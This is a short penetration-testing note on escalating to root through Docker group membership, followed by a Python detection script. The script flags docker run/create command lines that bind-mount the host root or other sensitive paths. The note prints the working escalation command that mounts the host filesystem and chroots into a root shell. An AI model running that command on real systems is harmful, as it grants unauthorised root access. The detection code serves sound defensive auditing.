Pentest: Docker Engine privilege escalation
Situation:
- SSH user with Docker privileges.
- Docker installed.
- Ubuntu server.
Normal Docker usage looks like this:
docker run hello-world
This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.
We have the privilege to execute it …
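Next:
- docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
- Explanation:
The -v parameter bind-mounts the host's root filesystem (/) into the container at /mnt, and -it runs the container with an interactive shell instead of as a background (daemon) process. --rm removes the container when the shell exits, and chroot /mnt bash starts a shell whose root directory is the mounted host filesystem.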
and result is .
Affected setup: https://docs.docker.com/engine/install/linux-postinstall/
More info about the bug: https://gtfobins.github.io/gtfobins/docker/
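
For detection, the following added example (not code from this page or from the Docker project) scans recorded command lines for docker run/create invocations that bind-mount the host root, as in the command above. It goes beyond the -v case to cover --volume and --mount, and the sample lines and the extra sensitive paths are assumptions of this example.

```python
import posixpath
import shlex

# "/" is the case on this page; the other paths are assumptions of this example.
SENSITIVE = ("/etc", "/root", "/var/run/docker.sock", "/run/docker.sock")
# Constructed sample command lines, as they might appear in an audit log.
SAMPLE = [
    "docker run hello-world",
    "docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash",
    "sudo /usr/bin/docker run --mount type=bind,src=/etc/,dst=/x alpine ls /x",
    "docker run -v pgdata:/var/lib/postgresql/data postgres",
]

def bind_source(flag, value):
    """Return the normalized host path a mount option binds, or None."""
    if flag == "--mount":
        opts = dict(kv.split("=", 1) for kv in value.split(",") if "=" in kv)
        src = (opts.get("source") or opts.get("src")) if opts.get("type") == "bind" else None
    else:  # -v/--volume: "name:/dst" and a lone "/dst" are not host paths
        src = value.split(":")[0] if ":" in value else None
    # normpath keeps a leading "//", so rebuild a single leading slash
    ok = src and src.startswith("/")
    return "/" + posixpath.normpath(src).lstrip("/") if ok else None

def risky_mounts(cmdline):
    """List sensitive host paths bind-mounted by one docker run/create line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a log line
        return []
    names = [posixpath.basename(a) for a in argv]
    args = argv[names.index("docker") + 1:] if "docker" in names else []
    if not {"run", "create"} & set(args):
        return []
    found = []
    for i, arg in enumerate(args):
        if arg in ("-v", "--volume", "--mount") and i + 1 < len(args):
            flag, value = arg, args[i + 1]
        elif arg.startswith(("--volume=", "--mount=")):
            flag, value = arg.split("=", 1)
        elif arg.startswith("-v") and len(arg) > 2:
            flag, value = "-v", arg[2:]
        else:
            continue
        path = bind_source(flag, value)
        if path and (path == "/" or any(path == p or path.startswith(p + "/") for p in SENSITIVE)):
            found.append(path)
    return found

FLAGGED = [line for line in SAMPLE if risky_mounts(line)]
```

Arguments after the image name are scanned as well, so a container command that happens to contain a mount-like option can produce a false positive.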